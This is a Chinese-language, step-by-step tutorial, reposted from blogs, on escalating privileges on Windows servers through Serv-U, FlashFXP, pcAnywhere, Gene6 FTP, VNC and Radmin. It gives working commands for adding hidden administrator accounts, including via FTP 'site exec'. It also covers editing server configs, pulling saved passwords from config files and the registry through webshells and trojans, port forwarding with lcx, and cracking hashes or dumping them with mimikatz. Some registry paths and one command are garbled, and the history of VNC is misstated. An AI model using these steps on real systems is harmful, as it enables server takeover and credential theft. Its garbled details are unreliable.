第三方软件/服务提权

1.Serv-u提权

Serv-U FTP Server，是一种被广泛运用的FTP服务器端软件，支持3x/9x/ME/NT/2K等全Windows系列。可以设定多个FTP服务器、限定登录用户的权限、登录主目录及空间大小等
漏洞概述:
1)5.04以下版本可用ServUX.exe进行远程溢出。
2)权限配置不当可用svu.exe添加管理员帐号。 svu.exe -i ip -u 用户 -p 密码 -a 路径
3)serv-u目录文件存在修改权限，直接修改配置文件添加管理用户。
(1):直接通过脚本大马的Serv-u提权功能提交一句话命令添加管理员帐号。
一句话:

cmd.exe /c net user best best /add & net localgroup Administrators best /add //意思是无回显的创建一个账号为best,密码也为best的用户,再将这个用户添加到管理员组里完成提权.

(2):通过修改配置文件提权
直接通过修改Serv-u的配置文件,路径为:C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
在配置文件里添加一个新用户,例如best,由于用户密码在Serv-u的配置文件里是经过MD5加密的,如果难破解可以通过在本地搭建一个Serv-u环境,建立一个用户,然后在配置文件里可以看到经过MD5加密的密码,使用自己的密码来当做用户best的密码.然后在本地的命令行里使用这个用户登录到ftp,然后执行:
quote site exec net user best666 best /add
quote site exec net localgroup administrators best666 /add
这两条命令就可以在系统里添加一个用户名为best666,密码为best的用户并将其添加到管理员组里来完成提权.

2.FlashFXP提权

FlashFXP是一款连接工具,这种工具用完之后他的账号和历史记录是保存的.只要在shell上发现FlashFxp的安装目录，渗透测试人员只需通过木马下载quick.dat、sites.dat、stats.dat这三个文件进行本地替换，直接覆盖本地的 FlashFxp文件，打开FlashFxp就可以看到管理员登陆过的信息，就可以获取登录密码.此外还可以用星号查看器这类工具直接查看登录密码.有了登录密码之后就可以按照上面的套路进行提权了

3.PCanyWhere提权

PCanyWhere是Symantec(赛门铁克)开发的一套老牌远程控制软件。在服务器上安装主控端,客户安装被控端,通过主控端控制被控端.这款软件的最大问题就是用户名和密码都在配置文件里,所以我们只需下载对方的配置文件在进行破解就可以登录对方的服务器了.
默认安装路径为C:\Program Files\Symantec\pcAnywhere\ *.cif文件默认路径为C:\DocumentS and Settings\All Users\Application Data\Symantec\pcAnywhere\Hosts\，通过木马把PCanyWhere的配置文件下载下来,然后拖到PCanyPass.exe工具例就可以看到用户名和密码,然后使用用户名和密码登录服务器,如果要提权就添加一个用户,在将这个用户加到管理员组里就可以完成提权了.

4.Gene6 FTP提权

Gene6 FTP默认安装路径是C:\Program Files\Gene6 FTP Server\RemoteAdmin\Remote.ini其中Remote.ini是主配置文件，管理员登录的ip、端口和密码都存储在这。但Gene6管理员帐号只充许本地登录。 对于渗透测试人员来讲只需要通过Webshell转发端口就可以进行远程连接。具体操作是通过webshell上传lcx.exe 把端口转发，如：lcx.exe –tran 600 127.0.0.1 8021 接通过另外一台机器安装一个gene6远程连接600端口创建一个域再创建一个有权限的帐号,注意Gene6可单独定义SITE命令调用
写一个能执行命令的批处理文件,并上传到目标主机.

@echo off
net user hack hack /add
net localgroup administrators hack /add

在SITE COMMANDS那个地方再进行配置，COMMAND那输入你的命令执行的名字,这里随便写什么都可以,EXECUTE这里输入你的BAT的命令执行文件的路径.也就是刚上传的那个文件的路径.

通过quote site exec执行文件

5.VNC提权

VNC(Virtual Network Computing，虚拟网络计算）是一套由英国剑桥大学AT&T实验室在2002年开发的轻量型跨平台远程控制计算机软件
vnc的默认端口是5901，使用端口扫描如果有便安装了vnc
可以通过脚本大马读注册表获取密码，如果不行利用菜刀上传一个cmd.exe到有读写权限的目录然后setp c:\路径...\cmd.exe #切换至上传的cmd来执行命令

Cmd/c"regedit/ec:\123.reg"HKEY_LOCAL_MACHINE\software\RealVNC\WinVNC4" "

获取的密码,将得出的十进制数去掉第一个数其他转换成16进制,破解16进制数得到密码
vncx.exe -W 回车
输入16进制数,连接vnc,读取,vncx4.exe -w 8个数 自动破解密码,使用我们vnc工具连接

6.Radmin提权

一款远控工具,端口扫描 4899 端口,Radmin server2.X、Radmin server3.0都存在一个“致命”漏洞 —— radmin hash提权漏洞
上传 radmin.asp 木马读取 radmin的加密密文,下载radmin工具连接
老版本的Radmin会在注册表中保留密码的Hash值，通过WEBSHELL、远程挂马读取注册表中的密码Hash值并在本地破解密码进行远程连接来达到提权目的

获取MD5Hash值

HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParametersParameter//默认密码注册表位置
HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParametersPort //默认端口注册表位置

使用RadminHash进行登录
在Radmin-Hash客户端输入RAdmin客户端的Hash值即可登录。然后在Radmin-Hash客户端新建服务端，输入所要连接的IP或者扫描存活主机进行连接

查看远程屏幕
在Radmin客户端选择屏幕控制，输入Hash值即可查看远程主机屏幕。

获取并破解密码
用mimikatz解析用户密码，也可以通过上传getpw.exe文件获取用户的sam值，再通过LC5解密。

登录远程桌面
在本地打开远程桌面连接器，输入远端IP进行登录。

转自：https://www.cnblogs.com/1996-11-01-614lb/p/14354831.html#gallery-1
https://www.jianshu.com/p/acd4817cb9da
https://blog.csdn.net/syy0201/article/details/103762148